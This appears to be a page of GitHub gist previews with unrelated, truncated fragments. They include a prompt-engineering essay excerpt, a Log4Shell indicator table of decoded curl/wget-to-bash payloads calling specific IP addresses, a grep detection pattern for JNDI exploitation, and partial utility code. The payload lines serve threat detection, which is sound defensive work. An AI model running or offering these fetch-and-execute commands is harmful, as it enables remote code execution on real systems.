https://github.com/jondurbin/airoboros
pip install --upgrade airoboros==2.0.13
https://github.com/jondurbin/airoboros
pip install --upgrade airoboros==2.0.13
Apologies for the snarky title, but there has been a huge amount of discussion around so called "Prompt Engineering" these past few months on all kinds of platforms. Much of it is coming from individuals who are peddling around an awful lot of "Prompting" and very little "Engineering".
Most of these discussions are little more than users finding that writing more creative and complicated prompts can help them solve a task that a more simple prompt was unable to help with. I claim this is not Prompt Engineering. This is not to say that crafting good prompts is not a difficult task, but it does not involve doing any kind of sophisticated modifications to general "template" of a prompt.
Others, who I think do deserve to call themselves "Prompt Engineers" (and an awful lot more than that), have been writing about and utilizing the rich new eco-system
Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)
b64decoded | hits | |
---|---|---|
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash | 2056 | |
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash | 162 | |
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash | 2 |
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
import hashlib | |
import re | |
def calculate_rule_hash(rule): | |
""" | |
Calculates a hash over the relevant YARA rule content (string contents, sorted condition) | |
Requires a YARA rule object as generated by 'plyara': https://github.com/plyara/plyara | |
:param rule: yara rule object | |
:return hash: generated hash | |
""" |
# ################################################################################ | |
# IMPORTANT NOTE | |
# The most recent version of this POC rule can now be found in the main repository | |
# https://github.com/Neo23x0/sigma/blob/master/other/godmode_sigma_rule.yml | |
# ################################################################################ | |
# _____ __ __ ___ __ | |
# / ___/__ ___/ / / |/ /__ ___/ /__ | |
# / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_) | |
# \___/\___/\_,_/ /_/ /_/\___/\_,_/\__/_ | |
# / __(_)__ ___ _ ___ _ / _ \__ __/ /__ |
import os | |
import sys | |
import traceback | |
from functools import wraps | |
from multiprocessing import Process, Queue | |
def processify(func): | |
'''Decorator to run a function as a process. | |
Be sure that every argument and the return value |
export PS1="\[\033[34m\]\w\[\033[35m\]\`ruby -e \"print (%x{git branch 2> /dev/null}.split(/\n/).grep(/^\*/).first || '').gsub(/^\* (.+)$/, '(\1)')\"\`\[\033[00m\]> " |
from PIL import Image | |
from PIL.ExifTags import TAGS, GPSTAGS | |
def get_exif_data(image): | |
"""Returns a dictionary from the exif data of an PIL Image item. Also converts the GPS Tags""" | |
exif_data = {} | |
info = image._getexif() | |
if info: | |
for tag, value in info.items(): | |
decoded = TAGS.get(tag, tag) |